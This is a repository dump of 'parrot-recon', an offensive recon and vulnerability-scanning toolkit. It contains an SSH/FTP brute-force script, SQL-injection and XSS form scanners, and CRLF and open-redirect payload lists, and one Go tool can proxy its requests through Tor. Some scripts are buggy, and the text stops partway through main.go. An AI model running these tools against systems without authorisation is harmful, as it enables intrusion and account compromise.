├── wordlists └── api-wordlist.txt ├── parrot-recon.png ├── tools ├── go.mod ├── go.sum ├── dork.sh ├── hydra.sh ├── sql.py ├── xssi.py ├── utils.py ├── main.go ├── Injectus.py ├── sqli.pl ├── shcheck.py ├── cors_scanner.py └── jwt_tool.py ├── webdav └── webdav.py ├── README.md ├── install-debian.sh ├── install-archlinux.sh └── parrot-recon.sh /wordlists/api-wordlist.txt: -------------------------------------------------------------------------------- 1 | admin 2 | users 3 | 1 4 | 2 5 | 3 6 | 4 7 | 5 8 | -------------------------------------------------------------------------------- /parrot-recon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/parrotassassin15/parrot-recon/HEAD/parrot-recon.png -------------------------------------------------------------------------------- /tools/go.mod: -------------------------------------------------------------------------------- 1 | module main 2 | 3 | go 1.17 4 | 5 | require github.com/bndr/gotabulate v1.1.2 // indirect 6 | -------------------------------------------------------------------------------- /tools/go.sum: -------------------------------------------------------------------------------- 1 | github.com/bndr/gotabulate v1.1.2 h1:yC9izuZEphojb9r+KYL4W9IJKO/ceIO8HDwxMA24U4c= 2 | github.com/bndr/gotabulate v1.1.2/go.mod h1:0+8yUgaPTtLRTjf49E8oju7ojpU11YmXyvq1LbPAb3U= 3 | -------------------------------------------------------------------------------- /webdav/webdav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # beta webdav handler 4 | # dev: parrotassassin15 5 | 6 | 7 | # imports 8 | from time import sleep as delay 9 | from os import system as s 10 | 11 | 12 | global host 13 | host = "http://127.0.0.1:8098" 14 | 15 | def main(): 16 | s("sudo service wsgidav start") 17 | print("Please wait...") 18 | for x in reversed(range(1,4)): 19 | print(x) 20 | delay(2) 21 | print("web dav server started. visit " + host) 22 | 23 | main() 24 | -------------------------------------------------------------------------------- /tools/dork.sh: -------------------------------------------------------------------------------- 1 | echo -e "[~] Targeting Domain -> $domain" 2 | FILES=("item_id=15") 3 | for ELEMENT in ${FILES[@]} 4 | do 5 | echo -e "[~] Fixed URL -> $domain $FILES" 6 | echo -e "[!] Trying Payload ${FILES}" 7 | URL="http://google.com/search?hl=en&safe=off&q=" 8 | STRING=`echo $domain | sed 's/ /%20/g'` 9 | URI="$URL%22$domain%22" 10 | lynx -dump $URI > gone.tmp 11 | sed 's/http/\^http/g' gone.tmp | tr -s "^" "\n" | grep http| sed 's/\ .*//g' > gtwo.tmp 12 | rm gone.tmp 13 | sed '/google.com/d' gtwo.tmp > urls 14 | rm gtwo.tmp 15 | echo "SExtraction -> Extracted `wc -l urls` and listed them in '`pwd`/urls' file for reference." 16 | echo "" 17 | cat urls 18 | done 19 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Parrots Recon ( A Recon Automation Script Beta V2 ) 2 | 3 | install: 4 | ``` 5 | git clone https://github.com/parrotassassin15/parrot-recon.git 6 | ``` 7 | 8 | ``` 9 | sudo chmod +x install-{platform}.sh ; sudo ./install-{platform}.sh 10 | ``` 11 | 12 | run: 13 | ``` 14 | sudo ./parrot-recon.sh -d -t -w 15 | ``` 16 | 17 |
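Note: `{platform}` in the install step is either `debian` or `archlinux`, matching the two install scripts in this repo. Based on the option parsing in `parrot-recon.sh` further down, `-d` takes the target domain, `-t` the scan type (`API`, `WEB`, or `ALL`), `-w` a wordlist, and `-c` a collection file (`.json` or `.yaml`) for API scans. A hypothetical run against a placeholder target could look like:

```
# example.com is a placeholder target; the wordlist ships with the repo
sudo ./parrot-recon.sh -d example.com -t WEB -w wordlists/api-wordlist.txt
```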
18 | 19 | # Current Release Support 20 | - Web Enumeration 21 | - Vulnerability Scans 22 | - API Enumeration 23 | 24 | # New Releases Coming Soon 25 | - Sends Email with Mailgun 26 | - Opens Local Web Server for Results 27 | 28 | <br/>
29 | 30 | Preview : 31 | 32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /tools/hydra.sh: -------------------------------------------------------------------------------- 1 | domain=$1 2 | results=$2 3 | ssh=$(cat $results | grep ssh | cut -b 15,16,17) 4 | ftp=$(cat $results | grep ftp | cut -b 15,16,17) 5 | 6 | 7 | function dict { 8 | read -p "Enter Dictionary List: " wordlist 9 | 10 | } 11 | 12 | if [ $ftp !=0 ] 13 | then 14 | echo "[+] FTP Service Found!" 15 | while true 16 | do 17 | read -p "Do You Want To Bruteforce FTP? " answer 18 | case $answer in 19 | [Yy]* ) dict; hydra -L $wordlist -P $wordlist $domain ftp; break;; 20 | [Nn]* ) break;; 21 | * ) echo "Please Answer yes or no.";; 22 | esac 23 | done 24 | else 25 | exit 0 26 | fi 27 | 28 | if [ $ssh !=0 ] 29 | then 30 | echo "[+] SSH Service Found!" 31 | while true 32 | do 33 | read -p "Do You Want To Bruteforce SSH? " answer 34 | case $answer in 35 | [Yy]* ) dict; hydra -L $wordlist -P $wordlist $domain ssh; break;; 36 | [Nn]* ) break;; 37 | * ) echo "Please Answer yes or no.";; 38 | esac 39 | done 40 | else 41 | exit 0 42 | fi -------------------------------------------------------------------------------- /tools/sql.py: -------------------------------------------------------------------------------- 1 | import os, sys, requests, colorama, subprocess 2 | import time as t 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | from pprint import pprint 6 | from colorama import Fore, Back, Style 7 | 8 | def CS(X): 9 | t.sleep(X) 10 | subprocess.call("clear") 11 | 12 | 13 | 14 | s = requests.Session() 15 | s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" 16 | 17 | 18 | def get_all_forms(url): 19 | soup = bs(s.get(url).content, "html.parser") 20 | return soup.find_all("form") 21 | 22 | 23 | def get_form_details(form): 24 | details = {} 25 | try: 26 | action = form.attrs.get("action").lower() 27 | except: 28 | action = None 29 | method = form.attrs.get("method", "get").lower() 30 | inputs = [] 31 | for input_tag in form.find_all("input"): 32 | input_type = input_tag.attrs.get("type", "text") 33 | input_name = input_tag.attrs.get("name") 34 | input_value = input_tag.attrs.get("value", "") 35 | inputs.append({"type": input_type, "name": input_name, "value": input_value}) 36 | details["action"] = action 37 | details["method"] = method 38 | details["inputs"] = inputs 39 | return details 40 | 41 | 42 | def is_vulnerable(response): 43 | errors = { 44 | "you have an error in your sql syntax;", 45 | "warning: mysql", 46 | "unclosed quotation mark after the character string", 47 | "quoted string not properly terminated", 48 | } 49 | for error in errors: 50 | if error in response.content.decode().lower(): 51 | return True 52 | print("[+] Error Given -> " + error) 53 | return False 54 | 55 | 56 | def scan_sql_injection(url): 57 | for c in "\"'": 58 | new_url = f"{url}{c}" 59 | servers = ["MySQL, Oracle, SqLServer"] 60 | for server in servers: 61 | print(Fore.YELLOW+"[!] 
Supported Servers: " + server) 62 | print("[~] Trying", new_url) 63 | res = s.get(new_url) 64 | if is_vulnerable(res): 65 | print("[+] SQL Vulnerability Detected On -> ", new_url) 66 | return 67 | forms = get_all_forms(url) 68 | print(f"[+] Detected {len(forms)} forms on {url}.") 69 | for form in forms: 70 | form_details = get_form_details(form) 71 | for c in "\"'": 72 | data = {} 73 | for input_tag in form_details["inputs"]: 74 | if input_tag["value"] or input_tag["type"] == "hidden": 75 | try: 76 | data[input_tag["name"]] = input_tag["value"] + c 77 | except: 78 | pass 79 | elif input_tag["type"] != "submit": 80 | data[input_tag["name"]] = f"test{c}" 81 | url = urljoin(url, form_details["action"]) 82 | if form_details["method"] == "post": 83 | res = s.post(url, data=data) 84 | elif form_details["method"] == "get": 85 | res = s.get(url, params=data) 86 | if is_vulnerable(res): 87 | print("[+] SQL Injection vulnerability detected, link:", url) 88 | print("[+] Form:") 89 | print(form_details) 90 | break 91 | 92 | if __name__ == "__main__": 93 | url = sys.argv[0] 94 | #url = str(input(" target URL -> ")) 95 | scan_sql_injection(url) -------------------------------------------------------------------------------- /install-debian.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # banner 4 | cat << "EOF" 5 | ____ ____ _______________ / /______ ________ _________ ____ 6 | / __ \/ __ `/ ___/ ___/ __ \/ __/ ___/ / ___/ _ \/ ___/ __ \/ __ \ 7 | / /_/ / /_/ / / / / / /_/ / /_(__ ) / / / __/ /__/ /_/ / / / / 8 | / .___/\__,_/_/ /_/ \____/\__/____/ /_/ \___/\___/\____/_/ /_/ 9 | /_/ 10 | _ __ ____ 11 | (_)___ _____/ /_____ _/ / /__ _____ 12 | / / __ \/ ___/ __/ __ `/ / / _ \/ ___/ 13 | / / / / (__ ) /_/ /_/ / / / __/ / 14 | /_/_/ /_/____/\__/\__,_/_/_/\___/_/ 15 | 16 | 17 | 18 | /.\ 19 | | \ 20 | / \ 21 | // / 22 | |/ /\__________________________________________________ 23 | / / 24 | / / 25 | \/ 26 | EOF 27 | 28 | 29 | # sets up enviornment variables and terminal colors 30 | red=`tput setaf 1` 31 | green=`tput setaf 2` 32 | white=`tput setaf 7` 33 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 34 | tools_dir=$working_dir/tools/ 35 | 36 | #makes sure the user is running as root 37 | if [ `whoami` != "root" ] 38 | then 39 | echo "[!] 
This Script Needs To Be Run As Root User" 40 | exit 0 41 | fi 42 | 43 | # starts the install of parrot recon tools and prints status 44 | echo "$green[+] Installing Tools Required For Parrot-Recon$white" 45 | 46 | echo "$red[+] installing Apt Packages For Parrot-Recon$white" 47 | sudo apt install nmap hydra nikto amass dirsearch ffuf dirbuster sslyze sublist3r wpscan wafw00f -y 48 | sudo apt install golang-go -y 49 | sudo apt install golang -y 50 | sudo apt install lynx -y 51 | 52 | echo "$red[+] Installing Golang Tools For Parrot-Recon$white" 53 | go install -v github.com/lukasikic/subzy@latest 54 | go mod tidy; go mod init main; go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 55 | go get github.com/bndr/gotabulate 56 | go get github.com/bndr/gotabulate 57 | 58 | 59 | # do not fuck with this it works dont mess with it parrot i swear 60 | echo "$red[+] Cloning Git Repos For Parrot-Recon$white" 61 | git clone https://github.com/Dionach/CMSmap $tools_dir/CMSmap 62 | git clone https://github.com/mlcsec/headi $tools_dir/headi 63 | git clone https://github.com/BountyStrike/Injectus $tools_dir/Injectus 64 | git clone https://github.com/chrispetrou/FDsploit $tools_dir/FDsploit 65 | git clone https://github.com/0xInfection/XSRFProbe $tools_dir/XSRFProbe 66 | git clone https://github.com/ticarpi/jwt_tool.git $tools_dir/jwt_tool 67 | 68 | 69 | # functions to make sure the tools are in the right place for parrot recon 70 | echo "$red[+] Running Functions To Put Tools In The Right Directory$white" 71 | 72 | cmsmap() { 73 | cd $tools_dir/CMSmap 74 | sudo python3 setup.py install 75 | } 76 | 77 | cmsmap 78 | 79 | headi() { 80 | cd $tools_dir/headi/ 81 | go build main.go 82 | sudo cp main /bin/headi 83 | } 84 | 85 | headi 86 | 87 | injectus() { 88 | cd $tools_dir/Injectus/ 89 | pip3 install -r requirements.txt 90 | cp *.py $tools_dir 91 | } 92 | 93 | injectus 94 | 95 | fdsploit() { 96 | cd $tools_dir/FDsploit 97 | cp fdploit.py ../ 98 | pip3 install -r requirements.txt 99 | } 100 | 101 | fdsploit 102 | 103 | 104 | xsrfprobe() { 105 | cd $tools_dir/XSRFProbe 106 | sudo python3 setup.py install 107 | } 108 | 109 | xsrfprobe 110 | 111 | jwt_tool() { 112 | echo "$red[!] JWT is not gonna be installed" 113 | 114 | } 115 | 116 | jwt_tool 117 | 118 | 119 | # read -p "Enter Password for webdav access" pass 120 | # read -e 121 | 122 | # needs to be set up properly 123 | echo "$red[+] Setting up webDAV portion" 124 | sudo cp webdav/wsgidav.service /etc/systemd/system/wsgidav.service 125 | 126 | 127 | 128 | echo "$green[+] Script Done!" 129 | echo "$green[+] You are Ready To Use Parrot-Recon!" 
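# NOTE: assumption, not part of the original script -- on Go 1.17+ toolchains
# `go get` is deprecated for installing binaries and `go mod tidy` expects an
# existing go.mod, so the "Installing Golang Tools" block above may fail as
# ordered. A minimal alternative sketch (untested here) would be:
#   go mod init main && go mod tidy
#   go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest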
130 | -------------------------------------------------------------------------------- /tools/xssi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from pprint import pprint 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | import colorama 6 | import time as t 7 | from colorama import Fore, Back, Style, init 8 | import datetime 9 | import sys 10 | from datetime import datetime 11 | 12 | init() 13 | 14 | def xss(): 15 | 16 | def get_all_forms(url): 17 | soup = bs(requests.get(url).content, "html.parser") 18 | return soup.find_all("form") 19 | 20 | 21 | def get_form_details(form): 22 | details = {} 23 | action = form.attrs.get("action").lower() 24 | method = form.attrs.get("method", "get").lower() 25 | inputs = [] 26 | for input_tag in form.find_all("input"): 27 | input_type = input_tag.attrs.get("type", "text") 28 | input_name = input_tag.attrs.get("name") 29 | inputs.append({"type": input_type, "name": input_name}) 30 | details["action"] = action 31 | details["method"] = method 32 | details["inputs"] = inputs 33 | return details 34 | 35 | 36 | def submit_form(form_details, url, value): 37 | target_url = urljoin(url, form_details["action"]) 38 | inputs = form_details["inputs"] 39 | data = {} 40 | for input in inputs: 41 | if input["type"] == "text" or input["type"] == "search": 42 | input["value"] = value 43 | input_name = input.get("name") 44 | input_value = input.get("value") 45 | if input_name and input_value: 46 | data[input_name] = input_value 47 | 48 | if form_details["method"] == "post": 49 | return requests.post(target_url, data=data) 50 | else: 51 | return requests.get(target_url, params=data) 52 | 53 | 54 | def scan_xss(url): 55 | print("\x1b[H\x1b[2J\x1b[3J") 56 | sc = "defualtxss.txt" 57 | print(Fore.RED+"----------------------------------------------") 58 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Utilizing Defualt xss script -> {sc}") 59 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Targeting URL -> {url}") 60 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Time Started -> " + str(datetime.now())) 61 | t.sleep(2) 62 | file2 = open('defualtxss.txt', 'r') 63 | l1 = file2.readlines() 64 | count = -0 65 | for line in l1: 66 | print(Fore.YELLOW+"[-] Payload {} -> {}".format(count, line.strip())) 67 | print("=============== Are you sure you want to continue ==================== ") 68 | y = str(input("\033[31m Y/n >>> ")) 69 | if y == 'Y': 70 | print("[+] Script started at -> " + str(datetime.now())) 71 | elif y == 'n': 72 | print("[~] Exiting....") 73 | sys.exit() 74 | else: 75 | print("[-] Not an option...") 76 | sys.exit() 77 | while True: 78 | file = open('defualtxss.txt', 'r') 79 | l = file.readlines() 80 | count =+ 1 81 | for line in l: 82 | print("[~] Testing Payload -> {} : {}".format(count, line.strip())) 83 | forms = get_all_forms(url) 84 | print(f"[+] Detected {len(forms)} forms on {url}.") 85 | js_script = "{}".format(line.strip()) 86 | is_vulnerable = False 87 | for form in forms: 88 | form_details = get_form_details(form) 89 | content = submit_form(form_details, url, js_script).content.decode() 90 | if js_script in content: 91 | print(f"[+] XSS Detected on {url}") # <- place where it was detected 92 | print(f"[*] Form details:") 93 | pprint(form_details) 94 | is_vulnerable = True 95 | return is_vulnerable 96 | 97 | 98 | if __name__ == "__main__": 99 | print("\x1b[H\x1b[2J\x1b[3J") 100 | #https://xss-game.appspot.com/level1/frame 101 | url = str(input(" URL >>> ")) 102 | 
print(scan_xss(url)) 103 | 104 | if __name__ == "__main__": 105 | xss() -------------------------------------------------------------------------------- /tools/utils.py: -------------------------------------------------------------------------------- 1 | import re 2 | from urllib.parse import urlsplit, urlunsplit 3 | 4 | crlf_payloads = [ 5 | "%0d%0abounty:strike", 6 | "%0abounty:strike", 7 | "%0dbounty:strike", 8 | "%23%0dbounty:strike", 9 | "%3f%0dbounty:strike", 10 | "%250abounty:strike", 11 | "%25250abounty:strike", 12 | "%%0a0abounty:strike", 13 | "%3f%0dbounty:strike", 14 | "%23%0dbounty:strike", 15 | "%25%30abounty:strike", 16 | "%25%30%61bounty:strike", 17 | "%u000abounty:strike", 18 | ] 19 | 20 | openredirect_params = [ 21 | "next", 22 | "url", 23 | "target", 24 | "rurl", 25 | "dest", 26 | "destination", 27 | "redir", 28 | "redirect_uri", 29 | "redirect_url", 30 | "redirect", 31 | "view", 32 | "image_url", 33 | "go", 34 | "return", 35 | "returnTo", 36 | "return_to", 37 | "checkout_url", 38 | "continue", 39 | "return_path", 40 | "to", 41 | "RedirectTo", 42 | "next", 43 | "nextURL", 44 | ] 45 | 46 | openredirect_payloads = [ 47 | "bountystrike.io", 48 | "/bountystrike.io", 49 | "/http://bountystrike.io", 50 | "//bountystrike.io", 51 | "///bountystrike.io", 52 | "////bountystrike.io", 53 | "%2fbountystrike.io", 54 | "%2f$2fbountystrike.io", 55 | "%2fbountystrike.io%2f%2f", 56 | "$2f%2fbountystrike.io%2f%2f", 57 | "%2fbountystrike.io//", 58 | ] 59 | 60 | def build_openredirect_list(url: str): 61 | 62 | query_param_regex = re.compile(r"([\w\-\_]+=[\w\-\.\_]+)") 63 | 64 | u2 = urlsplit(url) 65 | 66 | if u2.query: 67 | re_keys = query_param_regex.findall(u2.query) 68 | keypairs= [] 69 | payload_keypairs = [] 70 | 71 | # Transform param=value to {"key": "param", "value": "param_value"} 72 | # Save all dics to list 73 | for keypair in re_keys: 74 | keypair_split = keypair.split("=") 75 | keypairs.append({"key": keypair_split[0], "value": keypair_split[1]}) 76 | 77 | # Transform the keypair dict to {"key": "param": "value": "payload"} 78 | for op in openredirect_params: 79 | keys = [k["key"] for k in keypairs] 80 | if op in keys: 81 | payload_keypairs.extend([{"key": op, "value": payload} for payload in openredirect_payloads]) 82 | 83 | # Change original params to payload params in the URL 84 | for x in payload_keypairs: 85 | pattern = re.compile(x["key"] + r"=[\w\-\.\_]+&*") 86 | sub, count = re.subn(pattern, f"{x['key']}={x['value']}", url) 87 | if count > 0: 88 | yield {"url": sub, "type": "openredirect", "payload": x['value']} 89 | 90 | 91 | elif u2.path: 92 | path = u2.geturl() 93 | 94 | for op_param in openredirect_params: 95 | pattern = re.compile(fr"{op_param}\/[\w\_\-\.]+\/*") 96 | for p in openredirect_payloads: 97 | sub, count = re.subn(pattern, f"{op_param}/{p}", path) 98 | if count > 0: 99 | yield {"url": sub, "type": "openredirect", "payload": p} 100 | 101 | 102 | else: 103 | # Append payload to end of URL 104 | for payload in openredirect_payloads: 105 | attack = f"{url}/{payload}" 106 | yield {"url": attack, "type": "openredirect", "payload": payload} 107 | 108 | 109 | def build_crlf_list(url: str): 110 | value_regex = re.compile(r"\w=([\w\-\.\_]+)&*") 111 | 112 | f = value_regex.findall(url) 113 | u = urlsplit(url) 114 | attacks= [] 115 | if urlsplit(url).query: 116 | query = urlsplit(url).query 117 | 118 | # sniper 119 | for payload in crlf_payloads: 120 | for p in f: 121 | attacks.append(query.replace(f"={p}", f"={payload}")) 122 | 123 | injected_queries = 
list(set(attacks)) 124 | for query in injected_queries: 125 | injected_url = urlunsplit(u._replace(query=query)) 126 | yield {"url": injected_url, "type": "crlf"} 127 | 128 | else: 129 | for payload in crlf_payloads: 130 | if not url.endswith("/"): 131 | injected_url = f"{url}/{payload}" 132 | else: 133 | injected_url = f"{url}{payload}" 134 | 135 | yield {"url": injected_url, "type": "crlf"} -------------------------------------------------------------------------------- /install-archlinux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # banner 4 | cat << "EOF" 5 | ____ ____ _______________ / /______ ________ _________ ____ 6 | / __ \/ __ `/ ___/ ___/ __ \/ __/ ___/ / ___/ _ \/ ___/ __ \/ __ \ 7 | / /_/ / /_/ / / / / / /_/ / /_(__ ) / / / __/ /__/ /_/ / / / / 8 | / .___/\__,_/_/ /_/ \____/\__/____/ /_/ \___/\___/\____/_/ /_/ 9 | /_/ 10 | _ __ ____ 11 | (_)___ _____/ /_____ _/ / /__ _____ 12 | / / __ \/ ___/ __/ __ `/ / / _ \/ ___/ 13 | / / / / (__ ) /_/ /_/ / / / __/ / 14 | /_/_/ /_/____/\__/\__,_/_/_/\___/_/ 15 | 16 | 17 | 18 | /.\ 19 | | \ 20 | / \ 21 | // / 22 | |/ /\__________________________________________________ 23 | / / 24 | / / 25 | \/ 26 | EOF 27 | 28 | 29 | # sets up enviornment variables and terminal colors 30 | red=`tput setaf 1` 31 | green=`tput setaf 2` 32 | white=`tput setaf 7` 33 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 34 | tools_dir=$working_dir/tools/ 35 | 36 | # makes sure the user is running as root 37 | if [ `whoami` != "root" ] 38 | then 39 | echo "[!] This Script Needs To Be Run As Root User" 40 | exit 0 41 | fi 42 | 43 | 44 | # makes sure you have black arch installed if not it installs it 45 | if [ -f /etc/pacman.d/blackarch-mirrorlist ] 46 | then 47 | echo "$green[+] You Are Good To Go No Need To Install The Black Arch Repos " 48 | else 49 | curl -O https://blackarch.org/strap.sh 50 | chmod +x strap.sh 51 | ./strap.sh 52 | fi 53 | 54 | # starts the install of parrot recon tools and prints status 55 | echo "$green[+] Installing Tools Required For Parrot-Recon$white" 56 | 57 | echo "$red[+] Installing Pacman Packages For Parrot-Recon$white" 58 | sudo pacman -S nmap hydra nikto amass dirsearch ffuf dirbuster sslyze sublist3r wpscan wafw00f -y 59 | sudo pacman -S golang-go -y 60 | sudo pacman -S install golang -y 61 | sudo pacman -S lynx -y 62 | sudo pacman -S git 63 | 64 | echo "$red[+] Installing Golang Tools For Parrot-Recon$white" 65 | go install -v github.com/lukasikic/subzy@latest 66 | go mod tidy; go mod init main; go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 67 | go get github.com/bndr/gotabulate 68 | go get github.com/bndr/gotabulate 69 | 70 | 71 | # do not fuck with this it works dont mess with it parrot i swear 72 | echo "$red[+] Cloning Git Repos For Parrot-Recon$white" 73 | git clone https://github.com/Dionach/CMSmap $tools_dir/CMSmap 74 | git clone https://github.com/mlcsec/headi $tools_dir/headi 75 | git clone https://github.com/BountyStrike/Injectus $tools_dir/Injectus 76 | git clone https://github.com/chrispetrou/FDsploit $tools_dir/FDsploit 77 | git clone https://github.com/0xInfection/XSRFProbe $tools_dir/XSRFProbe 78 | git clone https://github.com/ticarpi/jwt_tool.git $tools_dir/jwt_tool 79 | 80 | 81 | # functions to make sure the tools are in the right place for parrot recon 82 | echo "$red[+] Running Functions To Put Tools In The Right Directory$white" 83 | 84 | cmsmap() { 85 | cd $tools_dir/CMSmap 86 | sudo python3 setup.py install 87 | } 88 | 89 | 
cmsmap 90 | 91 | headi() { 92 | cd $tools_dir/headi/ 93 | go build main.go 94 | sudo cp main /bin/headi 95 | } 96 | 97 | headi 98 | 99 | injectus() { 100 | cd $tools_dir/Injectus/ 101 | pip3 install -r requirements.txt 102 | cp *.py $tools_dir 103 | } 104 | 105 | injectus 106 | 107 | fdsploit() { 108 | cd $tools_dir/FDsploit 109 | cp fdploit.py ../ 110 | pip3 install -r requirements.txt 111 | } 112 | 113 | fdsploit 114 | 115 | 116 | xsrfprobe() { 117 | cd $tools_dir/XSRFProbe 118 | sudo python3 setup.py install 119 | } 120 | 121 | xsrfprobe 122 | 123 | jwt_tool() { 124 | echo "$red[!] JWT is not gonna be installed" 125 | 126 | } 127 | 128 | jwt_tool 129 | 130 | 131 | # read -p "Enter Password for webdav access" pass 132 | # read -e 133 | 134 | # needs to be set up properly 135 | echo "$red[+] Setting up WebDAV portion" 136 | echo "$red[!] Not Ready Yet Check Back Later" 137 | #sudo cp webdav/wsgidav.service /etc/systemd/system/wsgidav.service 138 | 139 | 140 | 141 | echo "$green[+] Script Done!" 142 | echo "$green[+] You are Ready To Use Parrot-Recon!" 143 | -------------------------------------------------------------------------------- /tools/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "flag" 7 | "fmt" 8 | "io/ioutil" 9 | "log" 10 | "net/http" 11 | "net/url" 12 | "os" 13 | "os/exec" 14 | "regexp" 15 | "runtime" 16 | "time" 17 | 18 | "github.com/bndr/gotabulate" 19 | ) 20 | 21 | var ( 22 | flagHelp = flag.Bool("h", false, `Print the help menu and exit`) 23 | flagList = flag.String("l", "", `Use a list for SQL Testing`) 24 | flagTor = flag.String("p", "", `Use tor proxies to connect to host`) 25 | flagTarget = flag.String("t", "", `target URL`) 26 | ) 27 | 28 | var Proxy string = "socks5://127.0.0.1:9050" 29 | 30 | func online() { 31 | response, err := http.Get("https://www.google.com") 32 | ch(err) 33 | if response.StatusCode != 200 { 34 | fmt.Println("\033[31m[-] You seem to not be online.....") 35 | fmt.Println("\033[31m[-] Exiting.....") 36 | os.Exit(0) 37 | } else { 38 | fmt.Println("[*] Online test passed.....") 39 | } 40 | } 41 | 42 | // 43 | // 44 | // 45 | // 46 | func tabletest() { 47 | row_1 := []interface{}{"john", 20, "ready"} 48 | 49 | // Create an object from 2D interface array 50 | t := gotabulate.Create([][]interface{}{row_1}) 51 | 52 | // Set the Headers (optional) 53 | t.SetHeaders([]string{*flagTarget}) 54 | t.SetEmptyString("None") 55 | t.SetAlign("center") 56 | fmt.Println(t.Render("grid")) 57 | } 58 | 59 | func listed() { 60 | flag.Parse() 61 | // 62 | // 63 | // 64 | f, err := os.Open(*flagList) 65 | if err != nil { 66 | fmt.Println("[-] Sorry could not parse the list -> ", *flagList) 67 | } 68 | defer f.Close() 69 | scan := bufio.NewScanner(f) 70 | // 71 | for scan.Scan() { 72 | jector := []string{ 73 | scan.Text(), 74 | } 75 | errors := []string{ 76 | "SQL", 77 | "MySQL", 78 | "ORA-", 79 | "syntax", // better verticle 80 | } 81 | 82 | errRegexes := []*regexp.Regexp{} 83 | for _, e := range errors { 84 | re := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) 85 | errRegexes = append(errRegexes, re) 86 | } 87 | 88 | for _, payload := range jector { 89 | 90 | client := new(http.Client) 91 | body := []byte(fmt.Sprintf("username=%s&password=p", payload)) 92 | 93 | req, err := http.NewRequest( 94 | "POST", 95 | *flagTarget, 96 | bytes.NewReader(body), 97 | ) 98 | 99 | if err != nil { 100 | log.Fatalf("\033[31m\t[!] 
Unable to generate request: %s\n", err) 101 | } 102 | 103 | req.Header.Add("Content-Type", "application/x-www-form-urlencoded") 104 | resp, err := client.Do(req) 105 | if err != nil { 106 | log.Fatalf("[!] Unable to process response: %s\n", err) 107 | } 108 | 109 | body, err = ioutil.ReadAll(resp.Body) 110 | if err != nil { 111 | log.Fatalf("[!] Unable to read response body: %s\n", err) 112 | } 113 | 114 | resp.Body.Close() // close response 115 | 116 | for idx, re := range errRegexes { 117 | if re.MatchString(string(body)) { 118 | stringerror := "Server is vulnerable" 119 | errormsg := "An error | detected vulnerability" 120 | // fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 121 | row_1 := []interface{}{errors[idx], payload} 122 | row_2 := []interface{}{errormsg} 123 | t := gotabulate.Create([][]interface{}{row_1, row_2}) 124 | t.SetHeaders([]string{*flagTarget, stringerror}) 125 | t.SetAlign("center") 126 | fmt.Println("\033[37m", t.Render("grid")) 127 | break 128 | //fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 129 | //break 130 | } 131 | } 132 | } 133 | } 134 | 135 | } 136 | 137 | func torhandel(err error) { 138 | if err != nil { 139 | fmt.Println("Error recived within this block | parsing -> ", Proxy) 140 | log.Fatal(err) 141 | } 142 | } 143 | 144 | func testproxy() { 145 | torProxyUrl, err := url.Parse(Proxy) 146 | 147 | if err != nil { 148 | fmt.Println("[-] Error when running proxy, is tor offline? or not being uses") 149 | os.Exit(0) 150 | } 151 | 152 | torTransport := &http.Transport{Proxy: http.ProxyURL(torProxyUrl)} 153 | client := &http.Client{Transport: torTransport, Timeout: time.Second * 5} 154 | resp, err := client.Get("https://www.google.com") 155 | 156 | if err != nil { 157 | fmt.Println("[-] Error when attempting connection using socket -> ", Proxy) 158 | fmt.Println("[-] Attempted to grab or make a GET request to server => https://www.google.com") 159 | log.Fatal(err) 160 | } 161 | defer resp.Body.Close() 162 | } 163 | 164 | func maintor() { 165 | flag.Parse() 166 | testproxy() 167 | torProxyUrl, err := url.Parse(Proxy) 168 | torhandel(err) 169 | torTransport := &http.Transport{Proxy: http.ProxyURL(torProxyUrl)} 170 | client := &http.Client{Transport: torTransport, Timeout: time.Second * 5} 171 | resp, err := client.Get(*flagTarget) 172 | ch(err) 173 | defer resp.Body.Close() 174 | fmt.Println("[*] Used Sock : ", Proxy) 175 | fmt.Println("[*] Status Code: ", resp.StatusCode) 176 | } 177 | 178 | func ch(err error) { 179 | if err != nil { 180 | log.Fatal(err) 181 | } 182 | } 183 | 184 | func clear() { 185 | if runtime.GOOS == "windows" { 186 | cls, err := exec.Command("cls").Output() 187 | if err != nil { 188 | log.Fatal(err) 189 | } 190 | output := string(cls[:]) 191 | fmt.Println(output) 192 | } 193 | if runtime.GOOS == "linux" { 194 | clear, err := exec.Command("clear").Output() 195 | ch(err) 196 | output := string(clear[:]) 197 | fmt.Println(output) 198 | } 199 | } 200 | 201 | func main() { 202 | flag.Parse() 203 | online() 204 | if *flagHelp { 205 | fmt.Println("\033[32m[*] Usage -> go run main.go -t ") 206 | fmt.Println("\033[32m[X] Extra -> -p true|false -l ") 207 | fmt.Println("\033[32m[X] Advances -> go run main.go -t -p -l | note it must be a main.txt") 208 | fmt.Println("---------------------------------------------------------------------------") 209 | flag.PrintDefaults() 210 | } 211 | if *flagTor == "true" { 212 | testproxy() 213 | maintor() 214 | } 215 | if *flagTor == 
